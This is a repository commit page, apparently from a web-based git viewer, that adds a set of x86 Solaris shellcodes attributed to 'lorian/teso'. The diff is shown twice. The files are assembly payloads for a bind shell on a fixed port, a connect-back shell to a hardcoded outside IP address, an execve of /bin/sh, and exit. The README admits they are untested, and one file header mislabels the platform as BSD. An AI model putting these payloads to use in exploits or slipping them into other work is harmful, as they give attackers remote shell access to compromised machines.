initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_solaris
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
5 files changed, 191 insertions, 0 deletions
diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README
new file mode 100644
index 0000000..da1d06b
--- /dev/null
+++ b/other/shellkit/x86_solaris/README
@@ -0,0 +1,7 @@
+x86/solaris shellcodes
+lorian/teso
+all shellcodes are untested for now, cause i dont have a solaris x86
+system to test on. could be that they all dont work...
+will test as soon i install solaris x86 at home... (maybe within next week)
diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s
new file mode 100644
index 0000000..1380747
--- /dev/null
+++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
+/* x86/BSD bindsh shellcode (89 bytes)
+   
+   lorian / teso
+*/
+        .globl  _cbegin
+        .globl  cbegin
+        .globl  _cend
+        .globl  cend
+_cbegin:
+cbegin:
+        movl    $0x3cfff8ff, %eax
+        notl    %eax
+        pushl   %eax
+        xorl    %ebx, %ebx
+        mull    %ebx
+        movb    $0x9a, %al
+        pushl   %eax
+        movl    %esp, %ecx
+        
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        incl    %ebx
+        pushl   %ebx
+        movb    $0xe6, %al
+        call    *%ecx
+        xchgl   %esi, %eax
+        pushl   %edx
+        pushw   $0x4444
+        pushw   %bx
+        movl    %esp, %ebp
+        pushl   $0x10
+        pushl   %ebp
+        pushl   %esi
+        xorl    %eax, %eax
+        movb    $0xe8, %al
+        call    *%ecx
+        movb    $0xe9, %al
+        call    *%ecx
+        pusha
+        popl    %edi
+        movb    $0xea, %al
+        call    *%ecx
+a:      
+        pushl   %ebx
+        pushl   %eax
+        movb    $0x3e, %al
+        call    *%ecx
+        decl    %ebx
+        jns     a
+        pushl   %edx
+        push    $0x68732F6E
+        push    $0x69622F2F
+        movl    %esp, %ebx
+        pushl   %edx
+        pushl   %ebx
+        movl    %esp, %edi
+        pushl   %edx
+        pushl   %edi
+        pushl   %ebx
+        movb    $0x3b, %al
+        call    *%ecx
+                                                        
+_cend:
+cend:
diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s
new file mode 100644
index 0000000..155015a
--- /dev/null
+++ b/other/shellkit/x86_solaris/connectsh.s
@@ -0,0 +1,60 @@
+/* x86/solaris connectsh shellcode (83 bytes)
+   
+   lorian / teso
+*/
+        .globl  _cbegin
+        .globl  cbegin
+        .globl  _cend
+        .globl  cend
+_cbegin:
+cbegin:
+        movl    $0x3cfff8ff, %eax
+        notl    %eax
+        pushl   %eax
+        xorl    %ebp, %ebp
+        mull    %ebp
+        movb    $0x9a, %al
+        pushl   %eax
+        movl    %esp, %ecx
+        
+        pushl   %ebp
+        incl    %ebp
+        pushl   %ebp
+        incl    %ebp
+        pushl   %ebp
+        movb    $0xe6, %al
+        call    *%ecx
+        xchgl   %esi, %eax
+        pushl   $0xcab058c3
+        pushw   $0x4444
+        pushw   %bp
+        movl    %esp, %edi
+        pushl   $0x10
+        pushl   %edi
+        pushl   %esi
+        xorl    %eax, %eax
+        movb    $0xeb, %al
+        call    *%ecx
+a:      pusha
+        pop     %esi
+        movb    $0x3e, %al
+        call    *%ecx
+        decl    %ebp
+        jns     a
+        pushl   %edx
+        push    $0x68732F6E
+        push    $0x69622F2F
+        movl    %esp, %ebx
+        pushl   %edx
+        pushl   %ebx
+        movl    %esp, %edi
+        pushl   %edx
+        pushl   %edi
+        pushl   %ebx
+        movb    $0x3b, %al
+        call    *%ecx
+                                                        
+_cend:
+cend:
diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s
new file mode 100644
index 0000000..428a2fe
--- /dev/null
+++ b/other/shellkit/x86_solaris/execve.s
@@ -0,0 +1,32 @@
+/* x86/solaris execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+ 
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        movl      $0x3cfff8ff, %eax
+        notl      %eax
+        pushl     %eax
+        xorl      %eax, %eax
+        cdq
+        movb      $0x9a, %al
+        pushl     %eax
+        movl      %esp, %edi
+        
+        movb      $0x3b, %al
+        pushl     %edx
+        push      $0x68732F6E
+        push      $0x69622F2F
+        movl      %esp, %ebx
+        pushl     %edx
+        pushl     %ebx
+        movl      %esp, %ecx
+        pushl     %edx
+        pushl     %ecx
+        pushl     %ebx
+        call      *%edi
+cend:
diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s
new file mode 100644
index 0000000..d332c6f
--- /dev/null
+++ b/other/shellkit/x86_solaris/exit.s
@@ -0,0 +1,24 @@
+/* x86/solaris exit shellcode
+ *
+ * lorian / teso 
+ */
+        .globl  cbegin
+        .globl  _cbegin
+        .globl  cend
+        .globl  _cend
+_cbegin:
+cbegin:
+        movl    $0x3cfff8ff, %eax
+        notl    %eax
+        pushl   %eax
+        xorl    %eax, %eax
+        movb    $0x9a, %al
+        pushl   %eax
+        movl    %esp, %edi
+        movb    $0x01, %al
+        call    *%edi
+_cend:
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_solaris
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/x86_solaris/README b/other/shellkit/x86_solaris/README new file mode 100644 index 0000000..da1d06b --- /dev/null +++ b/other/shellkit/x86_solaris/README
@@ -0,0 +1,7 @@
	1	x86/solaris shellcodes
	2
	3	lorian/teso
	4
	5	all shellcodes are untested for now, cause i dont have a solaris x86
	6	system to test on. could be that they all dont work...
	7	will test as soon i install solaris x86 at home... (maybe within next week)


diff --git a/other/shellkit/x86_solaris/bindshell.s b/other/shellkit/x86_solaris/bindshell.s new file mode 100644 index 0000000..1380747 --- /dev/null +++ b/other/shellkit/x86_solaris/bindshell.s
@@ -0,0 +1,68 @@
	1	/* x86/BSD bindsh shellcode (89 bytes)
	2
	3	lorian / teso
	4	*/
	5
	6	.globl _cbegin
	7	.globl cbegin
	8	.globl _cend
	9	.globl cend
	10
	11	_cbegin:
	12	cbegin:
	13	movl $0x3cfff8ff, %eax
	14	notl %eax
	15	pushl %eax
	16	xorl %ebx, %ebx
	17	mull %ebx
	18	movb $0x9a, %al
	19	pushl %eax
	20	movl %esp, %ecx
	21
	22	pushl %ebx
	23	incl %ebx
	24	pushl %ebx
	25	incl %ebx
	26	pushl %ebx
	27	movb $0xe6, %al
	28	call *%ecx
	29
	30	xchgl %esi, %eax
	31	pushl %edx
	32	pushw $0x4444
	33	pushw %bx
	34	movl %esp, %ebp
	35	pushl $0x10
	36	pushl %ebp
	37	pushl %esi
	38	xorl %eax, %eax
	39	movb $0xe8, %al
	40	call *%ecx
	41	movb $0xe9, %al
	42	call *%ecx
	43	pusha
	44	popl %edi
	45	movb $0xea, %al
	46	call *%ecx
	47	a:
	48	pushl %ebx
	49	pushl %eax
	50	movb $0x3e, %al
	51	call *%ecx
	52	decl %ebx
	53	jns a
	54	pushl %edx
	55	push $0x68732F6E
	56	push $0x69622F2F
	57	movl %esp, %ebx
	58	pushl %edx
	59	pushl %ebx
	60	movl %esp, %edi
	61	pushl %edx
	62	pushl %edi
	63	pushl %ebx
	64	movb $0x3b, %al
	65	call *%ecx
	66
	67	_cend:
	68	cend:


diff --git a/other/shellkit/x86_solaris/connectsh.s b/other/shellkit/x86_solaris/connectsh.s new file mode 100644 index 0000000..155015a --- /dev/null +++ b/other/shellkit/x86_solaris/connectsh.s
@@ -0,0 +1,60 @@
	1	/* x86/solaris connectsh shellcode (83 bytes)
	2
	3	lorian / teso
	4	*/
	5
	6	.globl _cbegin
	7	.globl cbegin
	8	.globl _cend
	9	.globl cend
	10
	11	_cbegin:
	12	cbegin:
	13	movl $0x3cfff8ff, %eax
	14	notl %eax
	15	pushl %eax
	16	xorl %ebp, %ebp
	17	mull %ebp
	18	movb $0x9a, %al
	19	pushl %eax
	20	movl %esp, %ecx
	21
	22	pushl %ebp
	23	incl %ebp
	24	pushl %ebp
	25	incl %ebp
	26	pushl %ebp
	27	movb $0xe6, %al
	28	call *%ecx
	29	xchgl %esi, %eax
	30	pushl $0xcab058c3
	31	pushw $0x4444
	32	pushw %bp
	33	movl %esp, %edi
	34	pushl $0x10
	35	pushl %edi
	36	pushl %esi
	37	xorl %eax, %eax
	38	movb $0xeb, %al
	39	call *%ecx
	40	a: pusha
	41	pop %esi
	42	movb $0x3e, %al
	43	call *%ecx
	44	decl %ebp
	45	jns a
	46	pushl %edx
	47	push $0x68732F6E
	48	push $0x69622F2F
	49	movl %esp, %ebx
	50	pushl %edx
	51	pushl %ebx
	52	movl %esp, %edi
	53	pushl %edx
	54	pushl %edi
	55	pushl %ebx
	56	movb $0x3b, %al
	57	call *%ecx
	58
	59	_cend:
	60	cend:


diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s new file mode 100644 index 0000000..428a2fe --- /dev/null +++ b/other/shellkit/x86_solaris/execve.s
@@ -0,0 +1,32 @@
	1	/* x86/solaris execve /bin/sh shellcode
	2	*
	3	* lorian / teso
	4	*/
	5
	6	.globl cbegin
	7	.globl cend
	8
	9	cbegin:
	10	movl $0x3cfff8ff, %eax
	11	notl %eax
	12	pushl %eax
	13	xorl %eax, %eax
	14	cdq
	15	movb $0x9a, %al
	16	pushl %eax
	17	movl %esp, %edi
	18
	19	movb $0x3b, %al
	20	pushl %edx
	21	push $0x68732F6E
	22	push $0x69622F2F
	23	movl %esp, %ebx
	24	pushl %edx
	25	pushl %ebx
	26	movl %esp, %ecx
	27	pushl %edx
	28	pushl %ecx
	29	pushl %ebx
	30	call *%edi
	31
	32	cend:


diff --git a/other/shellkit/x86_solaris/exit.s b/other/shellkit/x86_solaris/exit.s new file mode 100644 index 0000000..d332c6f --- /dev/null +++ b/other/shellkit/x86_solaris/exit.s
@@ -0,0 +1,24 @@
	1	/* x86/solaris exit shellcode
	2	*
	3	* lorian / teso
	4	*/
	5	.globl cbegin
	6	.globl _cbegin
	7	.globl cend
	8	.globl _cend
	9
	10	_cbegin:
	11	cbegin:
	12	movl $0x3cfff8ff, %eax
	13	notl %eax
	14	pushl %eax
	15	xorl %eax, %eax
	16	movb $0x9a, %al
	17	pushl %eax
	18	movl %esp, %edi
	19	movb $0x01, %al
	20	call *%edi
	21
	22
	23	_cend:
	24	cend: